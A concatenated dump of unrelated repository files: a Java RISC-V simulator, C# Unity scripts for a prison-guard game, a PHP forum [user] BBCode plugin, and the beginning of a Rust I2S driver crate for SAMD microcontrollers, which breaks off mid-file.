     * stdin printing the requested datapath value for each command.
     * Returns -1 for "done", 1 for "next"/"n"; anything else keeps looping.
     */
    public int read(registerFile rF, dataMemory dM, controller cont, int PC, String instr, String readData1, String readData2, String immediate, alu operation, String aluResult) throws Exception{
        System.out.println("PC: " + PC);
        while (true){
            String s = reader.next();
            switch (s){
                case "done":
                    return -1; //-1 for done, 0 for pause, 1 for go next
                case "next":
                case "n":
                    return 1;
                case "inst":
                    // Instruction strings are stored LSB-first; flip for display.
                    System.out.println(bin.flipStr(instr));
                    break;
                case "opcode":
                    System.out.println(instrOps.findOp(instr));
                    break;
                case "func3":
                    System.out.println(instrOps.func3(instr));
                    break;
                case "func7":
                    System.out.println(instrOps.func7(instr));
                    break;
                case "rs1":
                    System.out.println(bin.binToInt(instrOps.rs1(instr)));
                    break;
                case "rs2":
                    System.out.println(bin.binToInt(instrOps.rs2(instr)));
                    break;
                case "rd":
                    System.out.println(bin.binToInt(instrOps.rd(instr)));
                    break;
                case "readdata1":
                    System.out.println(bin.binToInt(readData1));
                    break;
                case "readdata2":
                    System.out.println(bin.binToInt(readData2));
                    break;
                case "immediate":
                    System.out.println(bin.binToInt(immediate));
                    break;
                case "operation":
                    System.out.println(operation);
                    break;
                case "aluop":
                    System.out.println(cont.aluop);
                    break;
                case "aluresult":
                    System.out.println(bin.binToInt(aluResult));
                    break;
                case "list":
                case "\n":
                default:
                    printCommands();
            }
        }
    }

    /** Prints every entry of the commands table on one line. */
    private void printCommands(){
        System.out.println("Available commands:");
        for (int i = 0; i < commands.length; i++){
            System.out.print(commands[i] + " ");
        }
        System.out.println();
    }
}
<file_sep>public class RISCVException extends Exception {
    /** Checked exception for unsupported/invalid values met while decoding or executing. */
    public RISCVException(String message){
        super(message);
    }
}
<file_sep>public final class bin {
//we only deal with signed binary here
public static int binToInt(String bin){
/*
int total = 0;
for (int i = bin.length() - 1; i >= 0; i-- ){
if (bin.charAt(i) == '1'){
total += Math.pow(2, (bin.length() - i - 1));
}
}
*/
int total = uBinToInt(bin);
if (bin.charAt(0) == '1'){
total = total - (int)Math.pow(2, (bin.length()));
}
return total;
}
public static int uBinToInt(String bin){
int total = 0;
for (int i = bin.length() - 1; i >= 0; i-- ){
if (bin.charAt(i) == '1'){
total += Math.pow(2, (bin.length() - i - 1));
}
}
return total;
}
public static String flipStr(String bin){
String newIns = "";
int len = bin.length();
for (int i = 0; i < len; i++){
newIns += bin.charAt(len - 1 - i);
}
return newIns;
}
public static String intToBin(int num){
if (num >= 0){return posIntToBin(num);}
else {return negIntToBin(num);}
}
private static String posIntToBin(int num){
int startingPow = 0;
int compareTo = 1;
while (compareTo <= num){
startingPow++;
compareTo = (int)Math.pow(2, startingPow);
}
String result = "";
int tempNum = num;
while (startingPow >= 0){
int power = (int)Math.pow(2, startingPow);
if (tempNum < power){
result += '0';
}
else{
result += '1';
tempNum -= power;
}
startingPow--;
}
return result;
}
private static String negIntToBin(int num){
String complement = posIntToBin(-1 * num - 1);
String result = "";
for (int i = 0; i < complement.length(); i++){
if(complement.charAt(i) == '1'){
result += '0';
}
else{
result += '1';
}
}
return result;
}
public static String signExtend(String binary, int targetLen){
char sign = binary.charAt(0);
return bitExtend(binary, targetLen, sign);
}
public static String bitExtend(String binary, int targetLen, char bit){
if (binary.length() > targetLen){
throw new AssertionError("Cannot sign extend to " + targetLen + " from " + binary.length() + " bits");
}
else if (binary.length() == targetLen){
return binary;
}
else{
int numRep = targetLen - binary.length();
String result = "";
for (int i = 0; i < numRep; i++){
result += bit;
}
result += binary;
return result;
}
}
}
<file_sep>public class dataMemory {
private String[][] memory; //save as bin str, 8 bits long per entry
public dataMemory(){
memory = new String[4][512];
}
public String handleMemory(int address, String reg2, String fct3, boolean memw, boolean memr){
if (memr){
switch (fct3){
case "010":
return loadWord(address);
case "001":
return loadHalf(address);
case "000":
return loadByte(address);
}
}
else if (memw){
switch (fct3){
case "010":
storeWord(address, bin.binToInt(reg2));
break;
case "001":
storeHalf(address, bin.binToInt(reg2));
break;
case "000":
storeByte(address, bin.binToInt(reg2));
break;
}
}
return bin.bitExtend("0", 32, '0');
}
private void checkIndex(int index){
if (index > 2047 || index <= 0){
throw new IndexOutOfBoundsException("Memory not in bound to load");
}
}
/*
Memory will be organized in little-endian fashion:
- the lowest significant bits will be held in the lowest addressed parcel
For now we use 4x512 memory structure with a total 2048 bytes of addressable memory, but
usually in a 32bit architecture 4GB of memory is supported
*/
//All LOAD instructions must return a 32bit binary String
private String loadWord(int index){ //index must be between 0 and 255
checkIndex(index);
String total = "";
for (int i = 0; i < 4; i++){
total = memory[i][index/4] + total;
}
return total;
}
private String loadHalf(int index){
checkIndex(index);
String total = "";
int whichHalf = index / 4 % 2;
for (int i = 0; i < 2; i++){
total = memory[i + whichHalf * 2][index/4] + total;
}
return total;
}
private String loadByte(int index){
checkIndex(index);
int whichQuart = index / 4 % 4;
String total = memory[whichQuart][index / 4];
return total;
}
private void storeWord(int index, int word){ //word = 32bit, stored as 4 8-bit segments
checkIndex(index);
String target = bin.intToBin(word);
target = bin.signExtend(target, 32);
for (int i = 0; i < 4; i ++){
memory[3-i][index/4] = target.substring(i*8, (i+1)*8);
}
}
private void storeHalf(int index, int word){
checkIndex(index);
String target = bin.intToBin(word);
target = bin.signExtend(target, 16);
int whichHalf = index / 4 % 2;
for (int i = 0; i < 2; i++){
memory[3 - (i + whichHalf * 2)][index / 4] = target.substring(i*8, (i+1)*8);
}
}
private void storeByte(int index, int word){
checkIndex(index);
String target = bin.intToBin(word);
target = bin.signExtend(target, 8);
int whichQuart = index / 4 % 4;
memory[3 - whichQuart][index / 4] = target;
}
}
<file_sep>public enum alu {
    // ALU operation selector returned by alu_controller; the trailing comments
    // record the 4-bit encodings each constant corresponds to.
    ALU_AND, // = 4'b0000,
    ALU_OR,// = 4'b0001,
    ALU_ADD,// = 4'b0010,
    ALU_SUB,// = 4'b0110,
    //ALU_LT = 4'b0111, // Less than
    ALU_NOR,// = 4'b1100,
    ALU_XOR,// = 4'b0111,
    ALU_SLT,// = 4'b1000,
    ALU_SLTU,//= 4'b1001,
    ALU_SRA,// = 4'b0100,
    ALU_SLL,// = 4'b0011,
    ALU_SRL,// = 4'b0101,
    ALU_SGE,// = 4'b1010,
    ALU_SGEU,//= 4'b1011
| 17c2cbb00f29163337432d9be174095f43e3d7c5 | [
"Markdown",
"Java"
] | 11 | Java | kthirano/processingProcessors | 7a8b32fd29f532e86f61b111302f19f78be22b2d | bf2dd8c8ff8ed70744f5f5587f35820865f4691e |
refs/heads/master | <file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.AI;
// Behaviour state for a Prisioner agent; Update() branches on this value.
public enum susBehaviour
{
    casual,    // wandering between random waypoints; may roll an escape attempt
    escaping,  // moving towards the escape position
    escaped,   // presumably: has reached the escape position — confirm in Update()
    fighting   // presumably: engaged in a fight (see fightImIn) — confirm in Update()
}
public class Prisioner : MonoBehaviour
{
#region BTS
public Vector3 target;
public Vector2 size;
public NavMeshAgent agent;
public NavMeshPath navMeshPath;
#endregion BTS
Animator animator;
#region Stats
public bool markedFighting;
public Vector3 fightingPos;
public susBehaviour currentBehaviour;
public float EscapeChance = 1;
public float fightChance = 1;
public float fightCoolDown = 5;
public float fightCoolDownMax = 8;
public Vector3 escapePos;
public fight fightImIn;
#endregion Stats
public PrisionManager prisionManagerScript;
public int group;
public Color baseColor;
public Color escapingColor;
public Color fightingColor;
public Color escapedColor;
public Sound escapeSound;
[Range(0, 1)]
public float escapeSoundVolume;
public Sound escapedSound;
[Range(0, 1)]
public float escapedSoundVolume;
void Start()
{
animator = GetComponent<Animator>();
navMeshPath = new NavMeshPath();
//Vector3 pos;
//pos.x = Random.Range(-size.x / 2, size.x / 2);
//pos.z = Random.Range(-size.y / 2, size.y / 2);
//pos.y = 0.5f;
//transform.position = pos;
transform.position = prisionManagerScript.GetRandomWayPoint(group).position;
GetRandomTarget();
agent.CalculatePath(target, navMeshPath);
}
// Update is called once per frame
void Update()
{
fightCoolDown -= Time.deltaTime;
float blendValue = Vector3.Magnitude(agent.velocity) / agent.speed;
switch (currentBehaviour)
{
case susBehaviour.casual:
agent.CalculatePath(target, navMeshPath);
if (navMeshPath.status != NavMeshPathStatus.PathComplete)
{
GetRandomTarget();
}
agent.SetDestination(target);
if (Vector3.Distance(transform.position, target) < 1)
{
// stay for a period of time
// randomise a idle time
//tries to escape
float randomNumber = Random.Range(0, 100);
// Debug.Log("Finsihed path");
if (randomNumber < EscapeChance)
{
// Debug.Log("trying to escape");
currentBehaviour = susBehaviour.escaping;
SoundManager.current.PlaySound(escapeSound, transform.position, escapeSoundVolume);
//agent.CalculatePath(escapePos.position, navMeshPath);
}
else
{
GetRandomTarget();
}
}
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", baseColor);
break;
case susBehaviour.escaping:
Vector3 exit = prisionManagerScript.exits[group][0].position;
float dist = Vector3.Distance(transform.position, prisionManagerScript.exits[group][0].position);
for (int i = 1; i < prisionManagerScript.exits[group].Count; i++)
{
float d = Vector3.Distance(transform.position, prisionManagerScript.exits[group][i].position);
if (d < dist)
{
exit = prisionManagerScript.exits[group][i].position;
dist = d;
}
}
escapePos = exit;
agent.SetDestination(escapePos);
if (Vector3.Distance(transform.position, escapePos) < 3)
{
//Debug.Log("Escaped");
prisionManagerScript.currentPrisionDamage += prisionManagerScript.escapedPrisonerDamage;
currentBehaviour = susBehaviour.escaped;
SoundManager.current.PlaySound(escapedSound, transform.position, escapedSoundVolume);
// gameObject.SetActive(false);
}
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", escapingColor);
break;
case susBehaviour.fighting:
agent.CalculatePath(fightingPos, navMeshPath);
agent.SetDestination(fightingPos);
//agent.transform.localRotation = Vector3.RotateTowards(agent, fightingPos, );
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", fightingColor);
break;
case susBehaviour.escaped:
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", escapedColor);
break;
}
animator.SetFloat("Blend", blendValue);
if (currentBehaviour == susBehaviour.fighting)
{
animator.SetBool("Fighting", true);
}
else
{
animator.SetBool("Fighting", false);
}
}
void OnTriggerEnter(Collider other)
{
if(other.tag == "Prisioner")
{
if ((fightCoolDown <= 0)&& other.transform.GetComponent<Prisioner>().fightCoolDown<=0 && currentBehaviour!=susBehaviour.escaped && other.transform.GetComponent<Prisioner>().currentBehaviour !=susBehaviour.escaped)
{
//Debug.Log("hit");
float randomNumber = Random.Range(0, 100);
if (randomNumber < fightChance)
{
fightCoolDown = fightCoolDownMax;
other.transform.GetComponent<Prisioner>().fightCoolDown = fightCoolDownMax;
prisionManagerScript.attemptToStartAFight(this, other.transform.GetComponent<Prisioner>());
}
}
}
}
public void GetRandomTarget()
{
//target.x = Random.Range(-size.x / 2, size.x / 2);
//target.z = Random.Range(-size.y / 2, size.y / 2);
//target.y = 0.0f;
target = prisionManagerScript.GetRandomWayPoint(group).position;
}
public void StopSussyBehaviour()
{
if(currentBehaviour == susBehaviour.escaped)
{
}
else if(currentBehaviour == susBehaviour.fighting)
{
fightImIn.fighterB.GetRandomTarget();
fightImIn.fighterA.GetRandomTarget();
fightImIn.fighterB.currentBehaviour = susBehaviour.casual;
fightImIn.fighterA.currentBehaviour = susBehaviour.casual;
prisionManagerScript.CurrentFights.Remove(fightImIn);
}
else
{
currentBehaviour = susBehaviour.casual;
GetRandomTarget();
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class FootStep : MonoBehaviour
{
public Transform leftFoot;
public Transform rightFoot;
public float footStepVolume;
public Sound sound;
public void PlayFootStepSoundLeft()
{
SoundManager.current.PlaySound(sound, leftFoot.position, footStepVolume);
}
public void PlayFootStepSoundRight()
{
SoundManager.current.PlaySound(sound, rightFoot.position, footStepVolume);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class RayReceiver : MonoBehaviour
{
protected bool hit = false;
public void Hit()
{
hit = true;
}
void LateUpdate()
{
hit = false;
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class DebugLines : MonoBehaviour
{
public LineRenderer lineRenderer;
public GameObject hand;
void Start()
{
}
// Update is called once per frame
void Update()
{
Ray ray = new Ray(hand.transform.position, hand.transform.forward);
lineRenderer.SetPosition(0, ray.origin);
lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class PhysicalPusher : MonoBehaviour
{
public Transform pointer;
LineRenderer lineRenderer;
void Start()
{
lineRenderer = GetComponent<LineRenderer>();
}
// Update is called once per frame
void Update()
{
Ray ray = new Ray(pointer.position, pointer.forward);
RaycastHit hit;
lineRenderer.SetPosition(0, ray.origin);
lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
if (OVRInput.Get(OVRInput.Button.PrimaryIndexTrigger))
{
if (Physics.Raycast(ray, out hit))
{
Rigidbody body = hit.collider.GetComponent<Rigidbody>();
if (body)
body.AddForce(100.0f * ray.direction);
}
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.AI;
enum featureLevel
{
// when used to tell when
}
public class fight : MonoBehaviour
{
public Prisioner fighterA;
public Prisioner fighterB;
public float currentLength =0;
}
public class PrisionManager : MonoBehaviour
{
// enum features added
// list of when each feature gets added
public List<List<Prisioner>> AllPrisioner;
public List<List<Transform>> wayPoints;
public List<List<Transform>> exits;
public List<fight> CurrentFights;
public float maxPrisionDamage=5;
public float currentPrisionDamage;
public GameObject PhysicalPrisionerList;
public GameObject wayPointObject;
public GameObject exitObject;
public float maxFightLength;
public float passiveFightDamage = 1;
public float endOfFightDamage = 5;
public float escapedPrisonerDamage;
public float currentGameTime =0;
public float maxGameTime =60;
public GameManagerScript GameManager;
#region UI
public GameObject playerHealthBar;
public GameObject TimeBar;
public GameObject candle;
public GameObject fireParticle;
public Vector3 originalFirePos;
#endregion UI
public List<Sound> engageSounds;
public List<Sound> disengageSounds;
[Range(0, 1)]
public float engageSoundVolume;
[Range(0, 1)]
public float disengageSoundVolume;
public List<GameObject> tallyMarks;
void Start()
{
SetUpWayPoints();
SetUpPrisioners();
SetExits();
originalFirePos = fireParticle.transform.localPosition;
}
void SetExits()
{
exits = new List<List<Transform>>();
for (int i = 0; i < exitObject.transform.childCount; i++)
{
exits.Add(new List<Transform>());
for (int j = 0; j < exitObject.transform.GetChild(i).childCount; j++)
{
exits[i].Add(exitObject.transform.GetChild(i).GetChild(j).GetComponent<Transform>());
}
}
}
void SetUpPrisioners()
{
AllPrisioner = new List<List<Prisioner>>();
for (int i = 0; i < PhysicalPrisionerList.transform.childCount; i++)
{
AllPrisioner.Add(new List<Prisioner>());
for (int j = 0; j < PhysicalPrisionerList.transform.GetChild(i).childCount; j++)
{
AllPrisioner[i].Add(PhysicalPrisionerList.transform.GetChild(i).GetChild(j).GetComponent<Prisioner>());
PhysicalPrisionerList.transform.GetChild(i).GetChild(j).GetComponent<Prisioner>().group = i;
}
// NavMeshAgent agent = PhysicalPrisionerList.transform.GetChild(i).GetComponent<NavMeshAgent>();
// agent.avoidancePriority = i;
}
}
void SetUpWayPoints()
{
wayPoints = new List<List<Transform>>();
for (int i = 0; i < wayPointObject.transform.childCount; i++)
{
wayPoints.Add(new List<Transform>());
for (int j = 0; j < wayPointObject.transform.GetChild(i).childCount; j++)
{
wayPoints[i].Add(wayPointObject.transform.GetChild(i).GetChild(j).transform);
}
}
}
public Transform GetRandomWayPoint(int group)
{
int index = Random.Range(0, wayPoints[group].Count - 1);
return wayPoints[group][index];
}
void UpdateUI()
{
// Debug.Log((currentPrisionDamage / maxPrisionDamage));
// playerHealthBar.GetComponent<RectTransform>().localScale = new Vector3((currentPrisionDamage / maxPrisionDamage) , playerHealthBar.GetComponent<RectTransform>().localScale.y, playerHealthBar.GetComponent<RectTransform>().localScale.z);
// TimeBar.GetComponent<RectTransform>().localScale = new Vector3((currentGameTime / maxGameTime), TimeBar.GetComponent<RectTransform>().localScale.y, TimeBar.GetComponent<RectTransform>().localScale.z);
/*
int index = (int)(candles.Length * percent);
for (int i = 0; i < candles.Length; i++)
{
if (i == index)
{
candles[i].SetActive(true);
}
else
{
candles[i].SetActive(false);
}
}
*/
}
public void attemptToStartAFight(Prisioner A, Prisioner B)
{
// check if they're fighting
if (A.currentBehaviour != susBehaviour.fighting && B.currentBehaviour != susBehaviour.fighting &&
A.currentBehaviour != susBehaviour.escaping && B.currentBehaviour != susBehaviour.escaping)
{
CurrentFights.Add(new fight());
CurrentFights[CurrentFights.Count - 1].fighterA = A;
CurrentFights[CurrentFights.Count - 1].fighterB = B;
A.currentBehaviour = susBehaviour.fighting;
B.currentBehaviour = susBehaviour.fighting;
Vector3 middleOfFight = new Vector3((A.transform.position.x + B.transform.position.x) / 2, (A.transform.position.y + B.transform.position.y) / 2, (A.transform.position.z + B.transform.position.z) / 2);
A.fightingPos = middleOfFight;
B.fightingPos = middleOfFight;
A.fightImIn = CurrentFights[CurrentFights.Count - 1];
B.fightImIn = CurrentFights[CurrentFights.Count - 1];
//COLOR
// A.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", new Color(0, 0, 255));
//COLOR
// B.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", new Color(0, 0, 255));
int index = Random.Range(0, engageSounds.Count - 1);
SoundManager.current.PlaySound(engageSounds[index], middleOfFight, engageSoundVolume);
//Debug.Log(middleOfFight);
}
}
void Update()
{
float percent = (maxGameTime - currentGameTime) / maxGameTime;
candle.transform.localScale = new Vector3(1, percent, 1);
fireParticle.transform.localPosition = new Vector3(fireParticle.transform.localPosition.x, originalFirePos.y - 0.611f * (currentGameTime / maxGameTime), fireParticle.transform.localPosition.z);
float percentage = currentPrisionDamage / maxPrisionDamage;
int tallyIndex = (int)(tallyMarks.Count * percentage);
for (int i = 0; i < tallyMarks.Count; i++)
{
if (i >= tallyIndex)
{
tallyMarks[i].SetActive(false);
}
else
{
tallyMarks[i].SetActive(true);
}
}
/*
int index = (int)(candles.Length * percent);
for (int i = 0; i < candles.Length; i++)
{
if (i == index)
{
candles[i].SetActive(true);
}
else
{
candles[i].SetActive(false);
}
}
*/
currentGameTime += Time.deltaTime;
for (int i=0; i<CurrentFights.Count; i++)
{
CurrentFights[i].currentLength += Time.deltaTime;
currentPrisionDamage += Time.deltaTime * passiveFightDamage;
if (CurrentFights[i].currentLength>=maxFightLength)
{
// fight ended.
currentPrisionDamage += endOfFightDamage;
CurrentFights[i].fighterA.currentBehaviour = susBehaviour.casual;
CurrentFights[i].fighterB.currentBehaviour = susBehaviour.casual;
CurrentFights.RemoveAt(i);
Prisioner a = CurrentFights[i].fighterA;
Prisioner b = CurrentFights[i].fighterB;
Vector3 middleOfFight = new Vector3((a.transform.position.x + b.transform.position.x) / 2, (a.transform.position.y + b.transform.position.y) / 2, (a.transform.position.z + b.transform.position.z) / 2);
int index = Random.Range(0, disengageSounds.Count - 1);
SoundManager.current.PlaySound(disengageSounds[index], middleOfFight, disengageSoundVolume);
}
}
if(currentPrisionDamage>=maxPrisionDamage)
{
// death
GameManager.loadLoseScreen();
}
if(currentGameTime>= maxGameTime)
{
// time out
GameManager.loadWinScreen();
}
UpdateUI();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Movement : MonoBehaviour
{
public Transform cam;
public float speed = 3;
// Update is called once per frame
void Update()
{
if (cam.eulerAngles.x > 10 && cam.eulerAngles.x < 30)
{
Vector3 fwd = cam.forward;
fwd.y = 0;
transform.position += fwd * speed * Time.deltaTime;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public enum Sound
{
FootStep,
EngageFight1,
EngageFight2,
EngageFight3,
DisengageFight1,
DisengageFight2,
DisengageFight3,
Escape,
Escaped
}
public class SoundManager : MonoBehaviour
{
public static SoundManager current;
[Range(0, 1)]
public float volume;
public Dictionary<Sound, AudioClip> audioMap = new Dictionary<Sound, AudioClip>();
private void Awake()
{
current = this;
audioMap.Add(Sound.FootStep, Resources.Load<AudioClip>("Sounds/FootStep"));
audioMap.Add(Sound.EngageFight1, Resources.Load<AudioClip>("Sounds/Engage Fight Sounds/EngageFight 1"));
audioMap.Add(Sound.EngageFight2, Resources.Load<AudioClip>("Sounds/Engage Fight Sounds/EngageFight 2"));
audioMap.Add(Sound.EngageFight3, Resources.Load<AudioClip>("Sounds/Engage Fight Sounds/EngageFight 3"));
audioMap.Add(Sound.DisengageFight1, Resources.Load<AudioClip>("Sounds/Disengage Fight Sounds/DisengageFight 1"));
audioMap.Add(Sound.DisengageFight2, Resources.Load<AudioClip>("Sounds/Disengage Fight Sounds/DisengageFight 2"));
audioMap.Add(Sound.DisengageFight3, Resources.Load<AudioClip>("Sounds/Disengage Fight Sounds/DisengageFight 3"));
audioMap.Add(Sound.Escape, Resources.Load<AudioClip>("Sounds/New Sounds/Run Alarm Sound"));
audioMap.Add(Sound.Escaped, Resources.Load<AudioClip>("Sounds/New Sounds/Game Win"));
}
AudioSource PlayClipAt(AudioClip clip, Vector3 pos, float volume)
{
GameObject tempGO = new GameObject("TempAudio"); // create the temp object
tempGO.transform.position = pos; // set its position
AudioSource aSource = tempGO.AddComponent<AudioSource>(); // add an audio source
aSource.clip = clip; // define the clip
// set other aSource properties here, if desired
aSource.volume = volume;
aSource.dopplerLevel = 0;
aSource.spatialBlend = 1;
aSource.Play(); // start the sound
Destroy(tempGO, clip.length); // destroy object after clip duration
return aSource; // return the AudioSource reference
}
public void PlaySound(Sound sound, Vector3 position, float multiplier)
{
PlayClipAt(audioMap[sound], position, volume * multiplier);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class KeyboardPlayerMovement : MonoBehaviour
{
#region Public Variables
public Camera head;
public float moveSpeed = 50;
public float cameraRotateSpeed = 50;
public Color highlightCol;
public Color passiveCol;
public LayerMask mask;
#endregion
#region Private Variables
float xMoveAmount;
float yMoveAmount;
float xTiltAmount;
float yTiltAmount;
LineRenderer lineRenderer;
GameObject lastTouched;
bool mounted = false;
bool unmounting = false;
public Vector3 positionBefore;
CharacterController characterController;
#endregion
void Start()
{
lineRenderer = GetComponent<LineRenderer>();
characterController = GetComponent<CharacterController>();
}
// Update is called once per frame
void Update()
{
passiveLook();
//if (Input.GetMouseButtonDown(0))
//if (Input.GetKeyDown(KeyCode.E))
//{
// if (!mounted)
// {
// PointAtSpotlight();
// }
// else
// {
// mounted = false;
// characterController.enabled = false;
// transform.localPosition = positionBefore;
// characterController.enabled = true;
// }
//}
xMoveAmount = Input.GetAxis("Horizontal");
yMoveAmount = Input.GetAxis("Vertical");
xTiltAmount += Input.GetAxis("Mouse X") * cameraRotateSpeed * Time.deltaTime;
yTiltAmount -= Input.GetAxis("Mouse Y") * cameraRotateSpeed * Time.deltaTime;
//yTiltAmount = Mathf.Clamp(yTiltAmount, -90.0f, 90.0f);
head.transform.localRotation = Quaternion.Euler(yTiltAmount, 0.0f, 0.0f);
transform.eulerAngles = new Vector3(0.0f, xTiltAmount, 0.0f);
//head.transform.Rotate(new Vector3(-xTiltAmount, yTiltAmount));
}
void FixedUpdate()
{
Vector3 camForward = head.transform.forward; // Used to have the player move based on the camera direction
camForward.y = 0;
camForward.Normalize();
Vector3 camRight = head.transform.right; // use our camera's right vector, which is always horizontal
camRight.Normalize();
Vector3 delta = (xMoveAmount * camRight + yMoveAmount * camForward) * moveSpeed * Time.fixedDeltaTime;
if (!mounted)
{
characterController.SimpleMove(delta);
}
}
void PointAtSpotlight()
{
// raycast
// if pris do something
Ray ray = new Ray(head.transform.position, head.transform.forward);
RaycastHit hit;
//lineRenderer.SetPosition(0, ray.origin);
//lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
if (Physics.Raycast(ray, out hit))
{
WatchTower spotLight = hit.collider.GetComponent<WatchTower>();
if (spotLight)
{
hit.collider.GetComponent<Renderer>().material.SetColor("_Color", new Color(255, 0, 0));
positionBefore = transform.position;
transform.localPosition = spotLight.mount.localPosition;
//transform.SetParent(spotLight.mount);
mounted = true;
}
}
}
void passiveLook()
{
// raycast
// if pris do something
Ray ray = new Ray(head.transform.position, head.transform.forward);
RaycastHit[] hits;
lineRenderer.SetPosition(0, ray.origin);
lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
hits = Physics.RaycastAll(ray);
bool hitted = false;
for (int i = 0; i < hits.Length; i++)
{
RaycastHit hit = hits[i];
if (mask == (mask | 1 << hit.collider.gameObject.layer))
{
//Debug.Log("Hit");
hit.collider.gameObject.GetComponent<Renderer>().material.SetColor("_Color", highlightCol);
lastTouched = hit.collider.gameObject;
hitted = true;
if (Input.GetKeyDown(KeyCode.E))
{
Debug.Log("Hit");
Transform parent = hit.collider.gameObject.transform.parent.parent;
if (parent)
{
Prisioner prisioner = parent.GetComponent<Prisioner>();
if (prisioner)
{
prisioner.StopSussyBehaviour();
}
}
}
break;
}
}
if (!hitted && lastTouched != null)
{
lastTouched.GetComponent<Renderer>().material.SetColor("_Color", passiveCol);
lastTouched = null;
}
}
}
| af7992d6b8544ac2ece3a512b58c398a8d53373b | [
"C#"
] | 9 | C# | LiamSmithCPU/Sussy | 6061fddbcd1d4d0d7412853b95577d1e4dc0d019 | 0f5f5445d4fb222f82486cb81dad0bbf7c3bd63d |
refs/heads/master | <file_sep><?php
// wcf imports
require_once(WCF_DIR.'lib/data/message/bbcode/BBCodeParser.class.php');
require_once(WCF_DIR.'lib/data/message/bbcode/BBCode.class.php');
/**
* Parses the [user]-BBCode.
*
* @author <NAME>
* @copyright 2011 wbbaddons.de
* @license Creative Commons BY-ND <http://creativecommons.org/licenses/by-nd/3.0/de/>
* @package de.wbbaddons.wcf.bbcode.user
*/
class UserBBCode implements BBCode {
/**
* @see BBCode::getParsedTag()
*/
public function getParsedTag($openingTag, $content, $closingTag, BBCodeParser $parser) {
$userID = intval(isset($openingTag['attributes'][0]) ? $openingTag['attributes'][0] : 0);
if ($userID == 0) {
$user = new User(null, null, StringUtil::decodeHTML($content));
$userID = $user->userID;
$content = $user->username;
}
if ($parser->getOutputType() == 'text/html') {
return '<img src="'.StyleManager::getStyle()->getIconPath('userS.png').'" alt="" /> <a href="index.php?page=User&userID='.$userID.'">'.$content.'</a>';
}
else if ($parser->getOutputType() == 'text/plain') {
return $content;
}
}
}
<file_sep><?php
// wcf imports
require_once(WCF_DIR.'lib/system/event/EventListener.class.php');
/**
* Adds the UserID for [user]-BBCode.
*
* @author <NAME>
* @copyright 2011 wbbaddons.de
* @license Creative Commons BY-ND <http://creativecommons.org/licenses/by-nd/3.0/de/>
* @package de.wbbaddons.wcf.bbcode.user
*/
class URLParserUserBBCodeListener implements EventListener {
/**
* @see EventListener::execute()
*/
public function execute($eventObj, $className, $eventName) {
// the only one we do not get is a username that contains "[/user]". But who would name himself that way? :D
preg_match_all('~\[user\](.*?)\[/user\]~', URLParser::$text, $matches);
// sort out duplicates, saves queries
array_unique($matches[1]);
foreach ($matches[1] as $match) {
$user = new User(null, null, $match);
if (!$user->userID) {
URLParser::$text = StringUtil::replace('[user]'.$match.'[/user]', $match, URLParser::$text);
}
else {
URLParser::$text = StringUtil::replace('[user]'.$match.'[/user]', '[user='.$user->userID.']'.$user->username.'[/user]', URLParser::$text);
}
}
}
}
| 1c0acc981d2aa8b21f4567d878cb6d8c5dda6467 | [
"PHP"
] | 2 | PHP | wbbaddons/User-BBCode | 42cfcbaeedb86b234e7f31a370d5960ab11072eb | 8d02b935bb961940231db3303507156dc07dc117 |
refs/heads/main | <file_sep>TODO for samd-i2s:
* Document
* Condition defmt on a feature flag
* Make the serializer allocation dynamic based on supplied pins
* Optionally get the clock(s) from external sources
* Warn if clock divisions don't work out evenly
* Allow not configuring a sender/receiver
* Add an i2s master along the lines of tdm_master()
* Implement a receive() like send()
* Re-implementation of MasterClock::freq() seems strange...
* Use Sealed as in https://github.com/atsamd-rs/atsamd/issues/214<file_sep>[package]
name = "samd-i2s"
version = "0.1.0"
authors = ["<NAME> <<EMAIL>>"]
edition = "2018"
keywords = ["no-std", "arm", "cortex-m", "embedded-hal", "samd", "atsamd", "samd21"]
[dependencies]
cortex-m = "~0.6"
defmt = "0.2.0"
defmt-rtt = "0.2.0"
[dependencies.atsamd-hal]
# Under-development version with DMA support
default-features = false
# git = "https://github.com/ianrrees/atsamd"
# branch = "add-dma"
path = '/home/irees/Projects/20201112 - atsamd-rs/hal'
[features]
samd21 = []
samd21g18a = ["samd21", "atsamd-hal/samd21g", "defmt-default"]
defmt-default = []
defmt-trace = []
defmt-debug = []
defmt-info = []
defmt-warn = []
defmt-error = []<file_sep>Obsolete - Do Not Use
===
This repo was a scratchpad space, the active code has moved to [a branch](https://github.com/ianrrees/atsamd/tree/add-i2s) of [the ATSAMD HAL](https://github.com/atsamd-rs/atsamd). Eventually, the plan is to merge it in with the upstream HAL.
<file_sep>#![no_std]
// feature approach cribbed from https://github.com/proman21/samd-dma
// TODO improve
#[cfg(not(feature = "samd21"))]
compile_error!("Please use this crate's feature flags to select a target.");
#[cfg(feature = "samd21")]
extern crate atsamd_hal as hal;
extern crate defmt_rtt;
use core::convert::From;
use core::marker::PhantomData;
use hal::dmac::Buffer;
use hal::gpio;
use hal::target_device as pac;
use hal::time::Hertz;
// TODO for samd5x parts, this will need to be pac::dmac::chctrla::TRIGSRC_A
#[cfg(any(feature = "samd11", feature = "samd21"))]
